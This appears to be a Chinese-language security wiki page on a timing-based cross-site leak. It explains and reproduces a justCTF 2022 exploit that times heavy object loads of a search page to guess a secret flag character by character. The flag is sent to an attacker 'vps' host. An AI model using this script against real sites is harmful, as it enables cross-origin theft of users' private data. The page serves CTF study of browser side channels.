performance.now + Force heavy task
最后更新于
最后更新于
利用来源于https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/
在这个挑战中,用户可以发送数千个字符,如果包含标志,则字符将被发送回给机器人。因此,通过发送大量字符,攻击者可以测量发送的字符串中是否包含标志。
最初,我没有设置对象的宽度和高度,但后来发现这很重要,因为默认大小太小,无法在加载时间上产生差异。
```html fetch('https://deelay.me/30000/https://example.com') function send(data) { fetch('http://vps?data='+encodeURIComponent(data)).catch(err => 1) }
function leak(char, callback) { return new Promise(resolve => { let ss = 'just_random_string' let url = http://baby-xsleak-ams3.web.jctf.pro/search/?search=${char}&msg=+ss[Math.floor(Math.random()*ss.length)].repeat(1000000) let start = performance.now() let object = document.createElement('object'); object.width = '2000px' object.height = '2000px' object.data = url; object.onload = () => { object.remove() let end = performance.now() resolve(end - start) } object.onerror = () => console.log('Error event triggered'); document.body.appendChild(object); })
}
send('start')
let charset = 'abcdefghijklmnopqrstuvwxyz_}'.split('') let flag = 'justCTF{'
async function main() { let found = 0 let notFound = 0 for(let i=0;i<3;i++) { await leak('..') } for(let i=0; i<3; i++) { found += await leak('justCTF') } for(let i=0; i<3; i++) { notFound += await leak('NOT_FOUND123') }
found /= 3 notFound /= 3
send('found flag:'+found) send('not found flag:'+notFound)
let threshold = found - ((found - notFound)/2) send('threshold:'+threshold)
if (notFound > found) { return }
// exploit while(true) { if (flag[flag.length - 1] === '}') { break } for(let char of charset) { let trying = flag + char let time = 0 for(let i=0; i<3; i++) { time += await leak(trying) } time/=3 send('char:'+trying+',time:'+time) if (time >= threshold) { flag += char send(flag) break } } } }
main()
```